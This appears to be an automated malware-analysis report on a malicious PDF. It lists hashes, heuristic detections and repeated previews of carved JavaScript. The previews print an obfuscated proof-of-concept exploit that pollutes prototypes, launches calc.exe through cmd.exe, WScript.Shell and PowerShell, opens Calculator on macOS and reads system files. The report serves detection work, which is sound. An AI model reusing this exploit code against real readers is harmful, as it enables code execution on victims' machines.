PDF malware analysis — malicious · e70188979cd48124

MALICIOUS

PDF

6.2 KB First seen: 2026-05-09

MD5: 6d67be8add80bbf45f22bcb39534f667 SHA-1: 7ff5798142af39f956e1a90a38159141dee37f76 SHA-256: e70188979cd48124b9b0b443499060897c4c5387e31b63c7fed4ad546b1a1ab0

354 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9997

Heuristics 10

Acrobat prototype-pollution PoC/exploit pattern — CVE-2026-34621 related critical CVE likely CVE_2026_34621_RELATED

PDF JavaScript combines Acrobat prototype pollution targeting privileged state with an execution or sensitive file-read primitive. This matches the likely CVE-2026-34621 PoC/exploit cluster without asserting the exact internal Adobe API chain.
JavaScript action low 4 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Prototype-pollution JavaScript pattern high CVE related PDF_JS_PROTOTYPE_POLLUTION

PDF JavaScript mutates object prototypes while also referencing privileged or sensitive PDF APIs. This tracks a modern PDF exploit technique family without assigning an unverified CVE.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
            app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\);
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript opens or fetches a remote URL/document low PDF_JS_REMOTE_DOC_FETCH

Embedded JavaScript calls app.openDoc() against a remote filesystem (cFS:'CHTTP'/'CFTP') or app.launchURL() to open an external / base64-encoded URL. This is the JS-driven remote-document / phishing-redirect technique — distinct from a /Launch file dropper. It exploits no CVE; the risk is where the URL leads.
Matched line in script
```
            app.launchURL('https://www.example.com', true);
```
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD

PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
app.launchURL with file/cmd/UNC target high PDF_FOXIT_LAUNCHURL

PDF JavaScript invokes app.launchURL() with a file://, cmd:, or UNC target — Foxit and Adobe handle these schemes inconsistently and they have been used for code execution and NTLM credential theft. (matched in decompressed stream)
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://www.example.com Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0006_000.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	5443 bytes
SHA-256: `3bb356747c1f7d54a5c7e2f0edbebe2d8a81716f97d3efa1ae51216e32278feb`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script (function _iacowmkctnpd() { setTimeout(function() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:36:08.359596 /* cjG4yzwKGeJWAyl switch(0) { case 1: break; default: break; } // === Prototype Pollution (CVE-2026-34621) === try { // 6n1JwlwDkIX1xe1 / Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; WDSlEkVQ6zVnAvy Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; / mxBSfhkC8ZeRDdu } catch(e) {} // === OS Detection === 2iWR8vihgJEthNg / var _nilcbvct = 'unknown'; // rGwp4609lgTvdip try { if (typeof app !== 'undefined' && app.platform) { // 2pid5Dfvl6clIso var _zdnamtmp = app.platform.toLowerCase(); if (_zdnamtmp.indexOf('win') >= 0) _nilcbvct = 'windows'; else if (_zdnamtmp.indexOf('mac') >= 0) _nilcbvct = 'macos'; / 19ZLwipUA1gkweR } KB5GbiwSRnTQY0F if (_nilcbvct === 'unknown' && typeof navigator !== 'undefined') { { let x = 'Q7kA4xvn'; } var _marfctojtl = navigator.userAgent.toLowerCase(); if (_marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows'; try { null.toString(); } catch(e) {} else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos'; /* MAFxKsEM2Y2MR4a / else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android'; / 37ufbA0G0VZmOk8 else if (_marfctojtl.indexOf('iphone') >= 0 \|\| _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios'; } /* c6tGC1GGzonYAOP / while(false) { break; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios } // Gc27UpIh1Ekpl8d } catch(e) {} // === OS-Specific Execution === try { if (_nilcbvct === 'windows') { // Method 1: app.launchURL with cmd.exe { let x = 'Q7kA4xvn'; } uAJyTHroDGMmxIR try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true); // dNb5lsORSmXCEVD } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var _unllxuwh = new ActiveXObject('WScript.Shell'); / dMxVj7WD3o0X0yV / _unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false); / SwTDejkrGVXqIJa } catch(e2) {} // Method 3: PowerShell direct try { null.toString(); } catch(e) {} rD0uUxiRAdKiubE try { if(false) { console.log('s5cV52Wxbb'); } var _unllxuwh = new ActiveXObject('WScript.Shell'); _unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false); // pARw6L3Dg88rtpU / switch(0) { case 1: break; default: break; } / TslgKOkTdJHAPEM } catch(e3) {} { let x = 'Q7kA4xvn'; } } else if (_nilcbvct === 'macos') { switch(0) { case 1: break; default: break; } // Method 1: Terminal via file:// /* tfkEArsb3SWIwKr / try { { let x = 'Q7kA4xvn'; } app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true); // 3Gu5U9NIyBYZodO / } catch(e1) {} // Method 2: osascript // pSWH7VxKqp0XCIx / try { if(false) { console.log('s5cV52Wxbb'); } var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)'; try { null.toString(); } catch(e) {} app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic)); } catch(e2) {} / QKIfKNL83Ga9vJY while(false) { break; } t8ecZjI7C5L4WR0 / } else { // Mobile platforms: demo fallback (not vulnerable) try { while(false) { break; } app.launchURL('https://www.example.com', true); // yIsLHXaXmnG8Ton app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} 01ATGV1O6aFAWpw } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context // tubX4UYuRUH7LMW try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; 3V4S3KbJ8VWQdI3 / util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}); } /* DDk3sJEvl9tbjQR / while(false) { break; } // cuVdBbhUFigNXfz / } catch(e) {} }, 10000); try { null.toString(); } catch(e) {} })();
`javascript_obj0006_001.js`	pdf-javascript-stream	PDF /JS object 6 at offset 0x15	5638 bytes
SHA-256: `a5585aa266e2b507a7dfd6c948fcc733ed1dd2d91715fee94dde52a7720cf805`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script << /JS ( \(function _iacowmkctnpd\(\) { setTimeout\(function\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:36:08.359596 /* cjG4yzwKGeJWAyl switch\(0\) { case 1: break; default: break; } // === Prototype Pollution \(CVE-2026-34621\) === try { // 6n1JwlwDkIX1xe1 / Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; WDSlEkVQ6zVnAvy Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; / mxBSfhkC8ZeRDdu } catch\(e\) {} // === OS Detection === 2iWR8vihgJEthNg / var _nilcbvct = 'unknown'; // rGwp4609lgTvdip try { if \(typeof app !== 'undefined' && app.platform\) { // 2pid5Dfvl6clIso var _zdnamtmp = app.platform.toLowerCase\(\); if \(_zdnamtmp.indexOf\('win'\) >= 0\) _nilcbvct = 'windows'; else if \(_zdnamtmp.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos'; / 19ZLwipUA1gkweR } KB5GbiwSRnTQY0F if \(_nilcbvct === 'unknown' && typeof navigator !== 'undefined'\) { { let x = 'Q7kA4xvn'; } var _marfctojtl = navigator.userAgent.toLowerCase\(\); if \(_marfctojtl.indexOf\('windows'\) >= 0\) _nilcbvct = 'windows'; try { null.toString\(\); } catch\(e\) {} else if \(_marfctojtl.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos'; /* MAFxKsEM2Y2MR4a / else if \(_marfctojtl.indexOf\('android'\) >= 0\) _nilcbvct = 'android'; / 37ufbA0G0VZmOk8 else if \(_marfctojtl.indexOf\('iphone'\) >= 0 \|\| _marfctojtl.indexOf\('ipad'\) >= 0\) _nilcbvct = 'ios'; } /* c6tGC1GGzonYAOP / while\(false\) { break; } // Adobe-specific mobile detection if \(typeof app !== 'undefined' && app.viewerType\) { if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) _nilcbvct = 'android'; // or ios } // Gc27UpIh1Ekpl8d } catch\(e\) {} // === OS-Specific Execution === try { if \(_nilcbvct === 'windows'\) { // Method 1: app.launchURL with cmd.exe { let x = 'Q7kA4xvn'; } uAJyTHroDGMmxIR try { app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\); // dNb5lsORSmXCEVD } catch\(e1\) {} // Method 2: ActiveX WScript.Shell try { var _unllxuwh = new ActiveXObject\('WScript.Shell'\); / dMxVj7WD3o0X0yV / _unllxuwh.Run\(String.fromCharCode\(99,97,108,99,46,101,120,101\), 0, false\); / SwTDejkrGVXqIJa } catch\(e2\) {} // Method 3: PowerShell direct try { null.toString\(\); } catch\(e\) {} rD0uUxiRAdKiubE try { if\(false\) { console.log\('s5cV52Wxbb'\); } var _unllxuwh = new ActiveXObject\('WScript.Shell'\); _unllxuwh.Run\(String.fromCharCode\(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32\)calc.exe"", 0, false\); // pARw6L3Dg88rtpU / switch\(0\) { case 1: break; default: break; } / TslgKOkTdJHAPEM } catch\(e3\) {} { let x = 'Q7kA4xvn'; } } else if \(_nilcbvct === 'macos'\) { switch\(0\) { case 1: break; default: break; } // Method 1: Terminal via file:// /* tfkEArsb3SWIwKr / try { { let x = 'Q7kA4xvn'; } app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\(String.fromCharCode\(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112\)\), true\); // 3Gu5U9NIyBYZodO / } catch\(e1\) {} // Method 2: osascript // pSWH7VxKqp0XCIx / try { if\(false\) { console.log\('s5cV52Wxbb'\); } var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode\(39,32,43,32\)open /System/Applications/Calculator.appString.fromCharCode\(32,43,32,39\)'; try { null.toString\(\); } catch\(e\) {} app.launchURL\('osascript://' + encodeURIComponent\(_gsgmqwugzic\)\); } catch\(e2\) {} / QKIfKNL83Ga9vJY while\(false\) { break; } t8ecZjI7C5L4WR0 / } else { // Mobile platforms: demo fallback \(not vulnerable\) try { while\(false\) { break; } app.launchURL\('https://www.example.com', true\); // yIsLHXaXmnG8Ton app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\); } catch\(e\) {} 01ATGV1O6aFAWpw } } catch\(mainErr\) {} // Additional trigger: attempt privileged file read to escalate context // tubX4UYuRUH7LMW try { if \(typeof util !== 'undefined' && util.readFileIntoStream\) { var _vdvdpgtaodbt = \(_nilcbvct === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts'; 3V4S3KbJ8VWQdI3 / util.readFileIntoStream\({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}\); } /* DDk3sJEvl9tbjQR / while\(false\) { break; } // cuVdBbhUFigNXfz / } catch\(e\) {} }, 10000\); try { null.toString\(\); } catch\(e\) {} }\)\(\); ) /S /JavaScript >>
`embedded_pdf_script_00000a66.bin`	pdf-embedded-script	PDF decompressed stream script payload at offset 0xA66	4085 bytes
SHA-256: `b0caeea48abd6e2ce137eacd9286ab117c90ca728318b6f8bcf23ca33e43a079`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 shell/COM execution token(s). Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script _marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows'; try { null.toString(); } catch(e) {} else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos'; /* MAFxKsEM2Y2MR4a / else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android'; / 37ufbA0G0VZmOk8 else if (_marfctojtl.indexOf('iphone') >= 0 \|\| _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios'; } /* c6tGC1GGzonYAOP / while(false) { break; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios } // Gc27UpIh1Ekpl8d } catch(e) {} // === OS-Specific Execution === try { if (_nilcbvct === 'windows') { // Method 1: app.launchURL with cmd.exe { let x = 'Q7kA4xvn'; } uAJyTHroDGMmxIR try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true); // dNb5lsORSmXCEVD } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var _unllxuwh = new ActiveXObject('WScript.Shell'); / dMxVj7WD3o0X0yV / _unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false); / SwTDejkrGVXqIJa } catch(e2) {} // Method 3: PowerShell direct try { null.toString(); } catch(e) {} rD0uUxiRAdKiubE try { if(false) { console.log('s5cV52Wxbb'); } var _unllxuwh = new ActiveXObject('WScript.Shell'); _unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false); // pARw6L3Dg88rtpU / switch(0) { case 1: break; default: break; } / TslgKOkTdJHAPEM } catch(e3) {} { let x = 'Q7kA4xvn'; } } else if (_nilcbvct === 'macos') { switch(0) { case 1: break; default: break; } // Method 1: Terminal via file:// /* tfkEArsb3SWIwKr / try { { let x = 'Q7kA4xvn'; } app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true); // 3Gu5U9NIyBYZodO / } catch(e1) {} // Method 2: osascript // pSWH7VxKqp0XCIx / try { if(false) { console.log('s5cV52Wxbb'); } var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)'; try { null.toString(); } catch(e) {} app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic)); } catch(e2) {} / QKIfKNL83Ga9vJY while(false) { break; } t8ecZjI7C5L4WR0 / } else { // Mobile platforms: demo fallback (not vulnerable) try { while(false) { break; } app.launchURL('https://www.example.com', true); // yIsLHXaXmnG8Ton app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} 01ATGV1O6aFAWpw } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context // tubX4UYuRUH7LMW try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; 3V4S3KbJ8VWQdI3 / util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}); } /* DDk3sJEvl9tbjQR / while(false) { break; } // cuVdBbhUFigNXfz / } catch(e) {} }, 10000); try { null.toString(); } catch(e) {} })();
`combined_document_js_000.js`	deobfuscated-js	combined document JavaScript streams at offset 0x15	11082 bytes
SHA-256: `4fc2a10c5c5dc0fea4ca1de99ef0e6f1f4416e417093b51f6aa643b567a5f14d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 16 shell/COM execution token(s). Carved artifact contains 12 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script (function _iacowmkctnpd() { setTimeout(function() { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:36:08.359596 /* cjG4yzwKGeJWAyl switch(0) { case 1: break; default: break; } // === Prototype Pollution (CVE-2026-34621) === try { // 6n1JwlwDkIX1xe1 / Object.prototype.__defineGetter__('__trusted', function() { return true; }); Object.prototype.constructor.prototype.bypass = true; WDSlEkVQ6zVnAvy Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; / mxBSfhkC8ZeRDdu } catch(e) {} // === OS Detection === 2iWR8vihgJEthNg / var _nilcbvct = 'unknown'; // rGwp4609lgTvdip try { if (typeof app !== 'undefined' && app.platform) { // 2pid5Dfvl6clIso var _zdnamtmp = app.platform.toLowerCase(); if (_zdnamtmp.indexOf('win') >= 0) _nilcbvct = 'windows'; else if (_zdnamtmp.indexOf('mac') >= 0) _nilcbvct = 'macos'; / 19ZLwipUA1gkweR } KB5GbiwSRnTQY0F if (_nilcbvct === 'unknown' && typeof navigator !== 'undefined') { { let x = 'Q7kA4xvn'; } var _marfctojtl = navigator.userAgent.toLowerCase(); if (_marfctojtl.indexOf('windows') >= 0) _nilcbvct = 'windows'; try { null.toString(); } catch(e) {} else if (_marfctojtl.indexOf('mac') >= 0) _nilcbvct = 'macos'; /* MAFxKsEM2Y2MR4a / else if (_marfctojtl.indexOf('android') >= 0) _nilcbvct = 'android'; / 37ufbA0G0VZmOk8 else if (_marfctojtl.indexOf('iphone') >= 0 \|\| _marfctojtl.indexOf('ipad') >= 0) _nilcbvct = 'ios'; } /* c6tGC1GGzonYAOP / while(false) { break; } // Adobe-specific mobile detection if (typeof app !== 'undefined' && app.viewerType) { if (app.viewerType.toLowerCase().indexOf('mobile') >= 0) _nilcbvct = 'android'; // or ios } // Gc27UpIh1Ekpl8d } catch(e) {} // === OS-Specific Execution === try { if (_nilcbvct === 'windows') { // Method 1: app.launchURL with cmd.exe { let x = 'Q7kA4xvn'; } uAJyTHroDGMmxIR try { app.launchURL('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent(String.fromCharCode(99,97,108,99,46,101,120,101)), true); // dNb5lsORSmXCEVD } catch(e1) {} // Method 2: ActiveX WScript.Shell try { var _unllxuwh = new ActiveXObject('WScript.Shell'); / dMxVj7WD3o0X0yV / _unllxuwh.Run(String.fromCharCode(99,97,108,99,46,101,120,101), 0, false); / SwTDejkrGVXqIJa } catch(e2) {} // Method 3: PowerShell direct try { null.toString(); } catch(e) {} rD0uUxiRAdKiubE try { if(false) { console.log('s5cV52Wxbb'); } var _unllxuwh = new ActiveXObject('WScript.Shell'); _unllxuwh.Run(String.fromCharCode(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32)calc.exe"", 0, false); // pARw6L3Dg88rtpU / switch(0) { case 1: break; default: break; } / TslgKOkTdJHAPEM } catch(e3) {} { let x = 'Q7kA4xvn'; } } else if (_nilcbvct === 'macos') { switch(0) { case 1: break; default: break; } // Method 1: Terminal via file:// /* tfkEArsb3SWIwKr / try { { let x = 'Q7kA4xvn'; } app.launchURL('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent(String.fromCharCode(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112)), true); // 3Gu5U9NIyBYZodO / } catch(e1) {} // Method 2: osascript // pSWH7VxKqp0XCIx / try { if(false) { console.log('s5cV52Wxbb'); } var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode(39,32,43,32)open /System/Applications/Calculator.appString.fromCharCode(32,43,32,39)'; try { null.toString(); } catch(e) {} app.launchURL('osascript://' + encodeURIComponent(_gsgmqwugzic)); } catch(e2) {} / QKIfKNL83Ga9vJY while(false) { break; } t8ecZjI7C5L4WR0 / } else { // Mobile platforms: demo fallback (not vulnerable) try { while(false) { break; } app.launchURL('https://www.example.com', true); // yIsLHXaXmnG8Ton app.alert('Demo: This PDF would exploit CVE-2026-34621 on desktop.'); } catch(e) {} 01ATGV1O6aFAWpw } } catch(mainErr) {} // Additional trigger: attempt privileged file read to escalate context // tubX4UYuRUH7LMW try { if (typeof util !== 'undefined' && util.readFileIntoStream) { var _vdvdpgtaodbt = (_nilcbvct === 'windows') ? 'C:\\Windows\\win.ini' : '/etc/hosts'; 3V4S3KbJ8VWQdI3 / util.readFileIntoStream({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}); } /* DDk3sJEvl9tbjQR / while(false) { break; } // cuVdBbhUFigNXfz / } catch(e) {} }, 10000); try { null.toString(); } catch(e) {} })(); << /JS ( \(function _iacowmkctnpd\(\) { setTimeout\(function\(\) { // CVE-2026-34621 Cross-Platform Exploit // Generated: 2026-04-27T11:36:08.359596 /* cjG4yzwKGeJWAyl switch\(0\) { case 1: break; default: break; } // === Prototype Pollution \(CVE-2026-34621\) === try { // 6n1JwlwDkIX1xe1 / Object.prototype.__defineGetter__\('__trusted', function\(\) { return true; }\); Object.prototype.constructor.prototype.bypass = true; WDSlEkVQ6zVnAvy Object.prototype.__proto__.privileged = true; Array.prototype.__proto__.polluted = true; / mxBSfhkC8ZeRDdu } catch\(e\) {} // === OS Detection === 2iWR8vihgJEthNg / var _nilcbvct = 'unknown'; // rGwp4609lgTvdip try { if \(typeof app !== 'undefined' && app.platform\) { // 2pid5Dfvl6clIso var _zdnamtmp = app.platform.toLowerCase\(\); if \(_zdnamtmp.indexOf\('win'\) >= 0\) _nilcbvct = 'windows'; else if \(_zdnamtmp.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos'; / 19ZLwipUA1gkweR } KB5GbiwSRnTQY0F if \(_nilcbvct === 'unknown' && typeof navigator !== 'undefined'\) { { let x = 'Q7kA4xvn'; } var _marfctojtl = navigator.userAgent.toLowerCase\(\); if \(_marfctojtl.indexOf\('windows'\) >= 0\) _nilcbvct = 'windows'; try { null.toString\(\); } catch\(e\) {} else if \(_marfctojtl.indexOf\('mac'\) >= 0\) _nilcbvct = 'macos'; /* MAFxKsEM2Y2MR4a / else if \(_marfctojtl.indexOf\('android'\) >= 0\) _nilcbvct = 'android'; / 37ufbA0G0VZmOk8 else if \(_marfctojtl.indexOf\('iphone'\) >= 0 \|\| _marfctojtl.indexOf\('ipad'\) >= 0\) _nilcbvct = 'ios'; } /* c6tGC1GGzonYAOP / while\(false\) { break; } // Adobe-specific mobile detection if \(typeof app !== 'undefined' && app.viewerType\) { if \(app.viewerType.toLowerCase\(\).indexOf\('mobile'\) >= 0\) _nilcbvct = 'android'; // or ios } // Gc27UpIh1Ekpl8d } catch\(e\) {} // === OS-Specific Execution === try { if \(_nilcbvct === 'windows'\) { // Method 1: app.launchURL with cmd.exe { let x = 'Q7kA4xvn'; } uAJyTHroDGMmxIR try { app.launchURL\('file:///C:/Windows/System32/cmd.exe?/c ' + encodeURIComponent\(String.fromCharCode\(99,97,108,99,46,101,120,101\)\), true\); // dNb5lsORSmXCEVD } catch\(e1\) {} // Method 2: ActiveX WScript.Shell try { var _unllxuwh = new ActiveXObject\('WScript.Shell'\); / dMxVj7WD3o0X0yV / _unllxuwh.Run\(String.fromCharCode\(99,97,108,99,46,101,120,101\), 0, false\); / SwTDejkrGVXqIJa } catch\(e2\) {} // Method 3: PowerShell direct try { null.toString\(\); } catch\(e\) {} rD0uUxiRAdKiubE try { if\(false\) { console.log\('s5cV52Wxbb'\); } var _unllxuwh = new ActiveXObject\('WScript.Shell'\); _unllxuwh.Run\(String.fromCharCode\(112,111,119,101,114,115,104,101,108,108,32,45,67,111,109,109,97,110,100,32\)calc.exe"", 0, false\); // pARw6L3Dg88rtpU / switch\(0\) { case 1: break; default: break; } / TslgKOkTdJHAPEM } catch\(e3\) {} { let x = 'Q7kA4xvn'; } } else if \(_nilcbvct === 'macos'\) { switch\(0\) { case 1: break; default: break; } // Method 1: Terminal via file:// /* tfkEArsb3SWIwKr / try { { let x = 'Q7kA4xvn'; } app.launchURL\('file:///System/Applications/Utilities/Terminal.app/?' + encodeURIComponent\(String.fromCharCode\(111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112\)\), true\); // 3Gu5U9NIyBYZodO / } catch\(e1\) {} // Method 2: osascript // pSWH7VxKqp0XCIx / try { if\(false\) { console.log\('s5cV52Wxbb'\); } var _gsgmqwugzic = 'do _unllxuwh _gsgmqwugzic String.fromCharCode\(39,32,43,32\)open /System/Applications/Calculator.appString.fromCharCode\(32,43,32,39\)'; try { null.toString\(\); } catch\(e\) {} app.launchURL\('osascript://' + encodeURIComponent\(_gsgmqwugzic\)\); } catch\(e2\) {} / QKIfKNL83Ga9vJY while\(false\) { break; } t8ecZjI7C5L4WR0 / } else { // Mobile platforms: demo fallback \(not vulnerable\) try { while\(false\) { break; } app.launchURL\('https://www.example.com', true\); // yIsLHXaXmnG8Ton app.alert\('Demo: This PDF would exploit CVE-2026-34621 on desktop.'\); } catch\(e\) {} 01ATGV1O6aFAWpw } } catch\(mainErr\) {} // Additional trigger: attempt privileged file read to escalate context // tubX4UYuRUH7LMW try { if \(typeof util !== 'undefined' && util.readFileIntoStream\) { var _vdvdpgtaodbt = \(_nilcbvct === 'windows'\) ? 'C:\\\\Windows\\\\win.ini' : '/etc/hosts'; 3V4S3KbJ8VWQdI3 / util.readFileIntoStream\({cDIPath: _vdvdpgtaodbt, bEncodeBase64: true}\); } /* DDk3sJEvl9tbjQR / while\(false\) { break; } // cuVdBbhUFigNXfz / } catch\(e\) {} }, 10000\); try { null.toString\(\); } catch\(e\) {} }\)\(\); ) /S /JavaScript >>

Open this report in the interactive analyzer, or submit your own file for analysis.